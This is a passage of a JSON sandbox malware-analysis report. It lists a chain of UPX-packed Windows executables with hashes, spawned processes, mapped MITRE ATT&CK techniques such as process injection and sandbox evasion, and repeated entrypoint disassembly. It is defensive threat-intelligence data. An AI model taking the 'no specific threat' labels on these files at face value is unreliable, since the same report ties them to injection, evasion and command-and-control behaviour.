80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "624000.exe", "file_size": 341838, "sha256": "c4c3659cd65028c72dce0c6aa9597d9345961c129ee3a55a7df46c7b67fc69a5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "6206480.exe", "file_size": 341827, "sha256": "c8f8d527f2ad55dfb81aa53ac833f0cc9268e80abc829dc8e30bff12a47762d8", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rdnjbjh.exe", "file_size": 341811, "sha256": "fe501491bdaa72fcdd556c44d70d5c6a1c887a75ea4ae17debeb8d8062a01bae", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2408206.exe", "file_size": 341798, "sha256": "cd0c5e05415d03ae61b4f1f98a98c6b67ee125ffe1b7e3281ed273bf69e462e2", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2204200.exe", "file_size": 341782, "sha256": "d167dc0f6aba85430b553101a171a4d7ab62e01db764abe63c66468c52297481", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "28042.exe", "file_size": 341762, "sha256": "69e26cf361e40818fddb0a7594b0516c2bf6bbccf68ef0500a466d174aaa3025", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "028260.exe", "file_size": 341742, "sha256": "e5023dc945a10ce60cf614b21875674a282352fea87ffab48a205072a3693c4d", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "tfdbnrd.exe", "file_size": 341728, "sha256": "1d3b8fc56f60df7e37a8af5d159bd973aa12d0052bfe7bfa12c9bbe0f8416fa7", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "rjrvvt.exe", "file_size": 341711, "sha256": "7fada6c7614d80404c06978e212a2375ad035245d8d4dcb17a6f72a24cd08b20", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "processes": [{"uid": "00000000-00005816", "name": "72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe", "normalized_path": "C:\\72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e.exe", "sha256": "72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e"}, {"uid": "00000000-00005896", "parentuid": "00000000-00005816", "name": "ptnfvbx.exe", "normalized_path": "c:\\ptnfvbx.exe", "sha256": "c9afde253391c763d3c027cbdde8f1b486d97c555cfafebb9c71ee0e097f7853"}, {"uid": "00000000-00005792", "parentuid": "00000000-00005896", "name": "lbxbhh.exe", "normalized_path": "c:\\lbxbhh.exe", "sha256": "d63351476f53d8d0aa476b01064b368c81fa7f69a258ca2a5b604538eb7fbb63"}, {"uid": "00000000-00005840", "parentuid": "00000000-00005792", "name": "vplpt.exe", "normalized_path": "c:\\vplpt.exe", "sha256": "c32db011ce76704fb22f05ec2f5a3848112d1ed0d0fd04c2de819c6630c85c27"}, {"uid": "00000000-00006048", "parentuid": "00000000-00005840", "name": "xdpjtxl.exe", "normalized_path": "c:\\xdpjtxl.exe", "sha256": "d6eaa98c285d743c7f63c9ba4a7a0e405e41fa0f9bbe433de071bd6159114875"}, {"uid": "00000000-00006000", "parentuid": "00000000-00006048", "name": "nxpbdf.exe", "normalized_path": "c:\\nxpbdf.exe", "sha256": "c6428cc9ad6e7151b653b0ea2fd87b5cba45cfcb5a5b5dbfdc7e670722c19093"}, {"uid": "00000000-00005784", "parentuid": "00000000-00006000", "name": "8080888.exe", "normalized_path": "c:\\8080888.exe", "sha256": "d77ca864e5ec44177637872cc85928602982420ee28932252ad7c372126aae9d"}, {"uid": "00000000-00006132", "parentuid": "00000000-00005784", "name": "800866.exe", "normalized_path": "c:\\800866.exe", "sha256": "e5c8ba21b6ab43a897e201244f9848452ee66e9f196e60aebb0ee6430b0dff17"}, {"uid": "00000000-00005968", "parentuid": "00000000-00006132", "name": "4400860.exe", "normalized_path": "c:\\4400860.exe", "sha256": "82dc98bf646a029489a8240f478a12bc33cd83f0a94669a45c2961fc53908a19"}, {"uid": "00000000-00004104", "parentuid": "00000000-00005968", "name": "8442880.exe", "normalized_path": "c:\\8442880.exe", "sha256": "7e322fae61739704e9a65b2ee016e63c187b18fd4d6d2b422f8f02112e4ff4e1"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 3, "informative_identifiers_count": 10}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 3, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 11}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 2, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "informative_identifiers_count": 7}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 6}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "informative_identifiers_count": 1}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"64446.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"fjpblh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"06268.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rlxfxx.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rxvnflf.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"80060.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"66686.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"624000.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"6206480.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rdnjbjh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"2408206.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"2204200.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"28042.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"028260.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"tfdbnrd.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"rjrvvt.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"blnxt.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"tnvhlh.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"ljhdxt.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"82426.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"28646.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"228864.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"8402266.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"088422.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"72d8f41b75688b029b15fbc4843d988a9afd1dd4c7acc64bd9ad1b42f0f80a3e\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"64446.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"fjpblh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"06268.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rlxfxx.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rxvnflf.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"80060.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"66686.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"624000.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"6206480.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"rdnjbjh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"2408206.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"2204200.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"28042.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 